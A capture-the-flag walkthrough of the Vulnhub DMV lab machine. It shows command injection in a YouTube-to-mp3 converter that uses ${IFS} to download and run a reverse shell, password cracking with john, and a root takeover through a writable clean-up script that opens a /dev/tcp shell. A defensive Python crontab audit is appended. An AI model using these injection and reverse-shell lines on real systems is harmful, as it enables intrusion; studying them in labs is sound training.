Vulnhub – DMV Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv

Then I used dirb http://192.168.1.5

We have this page where you convert a YouTube link to mp3:

Every time we put in a link nothing happens, but let's use Burp Suite to see what's going on in the background:

We have this output; I played around by trying different commands and scripts instead of the YouTube link:

I searched for "WARNING: Assuming --restrict-filenames" and got a couple of links, link1 and link2, and all I had to do was try to upload a shell with different methods until one worked. I used ${IFS} to stand in for the spaces between the words:

First I made the shell with msfvenom.

Then I edited the shell script:

From cd /tmp; wget http://192.168.1.13:80/shell.sh; chmod 777 shell.sh; ./shell.sh

To cd${IFS}/tmp;${IFS}wget${IFS}http://192.168.1.13:80/shell.sh;${IFS}chmod${IFS}777${IFS}shell.sh;${IFS}./shell.sh

Start a SimpleHTTPServer on our machine and an nc listener:

After that there is a folder admin, and inside it the flag and the .htpasswd

We're going to use john to crack the password for this one: john --wordlist=/root/pass/rockyou.txt hashfile. The password is Jessie; now we need to find where to use it.

I was searching for any hidden files with ls -alhR /var/www/ and came across this one, clean.sh; it's a file to remove the files from inside the download folder:

All we have to do is modify the file like this: bash -i >& /dev/tcp/192.168.1.13/3333 0>&1, then wait for the file to run and we get a shell back to our listening port, in this case 3333. Then we are root and catch the flag:
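The privilege escalation works because a script that runs with elevated rights can be edited by a low-privileged account. The page does not say what runs clean.sh; the usual case, assumed here, is a root cron job. As an added example (not from the page or the box), this Python audit parses /etc/crontab-style lines, resolves the scripts they execute and flags any that group or others can write. The fixture it builds in a temporary directory is constructed for the demonstration.

```python
import os
import stat
import tempfile
from pathlib import Path


def parse_cron_commands(crontab_text: str):
    """Yield (user, command) from /etc/crontab-style lines: five time fields, a user, then the command.
    Comments, blank lines and VAR=value assignments are skipped."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first:  # SHELL=/bin/sh, PATH=... and similar
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        yield fields[5], fields[6]


def script_paths(command: str):
    """Absolute paths mentioned in a cron command ('bash /opt/x.sh', '/opt/x.sh > /dev/null', ...)."""
    return [tok for tok in command.replace(";", " ").split()
            if tok.startswith("/") and tok != "/dev/null"]


def find_writable_cron_scripts(crontab_text: str):
    """Return [(user, path)] for scripts cron runs that group or others can modify.
    When user is root, whoever can edit the file gets their own commands run as root on the next tick."""
    findings = []
    for user, command in parse_cron_commands(crontab_text):
        for path in script_paths(command):
            try:
                mode = os.stat(path).st_mode
            except FileNotFoundError:
                continue
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((user, path))
    return findings


def demo():
    """Constructed fixture: one world-writable clean-up script and one locked-down script."""
    tmp = Path(tempfile.mkdtemp())
    bad = tmp / "clean.sh"
    bad.write_text("#!/bin/bash\necho 'constructed placeholder for the clean-up job'\n")
    bad.chmod(0o777)  # anyone can edit it: this is the finding
    good = tmp / "rotate.sh"
    good.write_text("#!/bin/bash\necho ok\n")
    good.chmod(0o755)  # owner-only write: not a finding
    crontab = (
        "# constructed sample /etc/crontab\n"
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        f"*/1 * * * * root bash {bad}\n"
        f"0 3 * * * root {good} > /dev/null 2>&1\n"
    )
    return find_writable_cron_scripts(crontab)


if __name__ == "__main__":
    for user, path in demo():
        print(f"cron job for {user} runs a group/world-writable script: {path}")
```

To run it against a real host, feed the contents of /etc/crontab and the files under /etc/cron.d to find_writable_cron_scripts; the fix for any hit is owner-only write permission on the script and its parent directory, with the owner being the account the job runs as.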
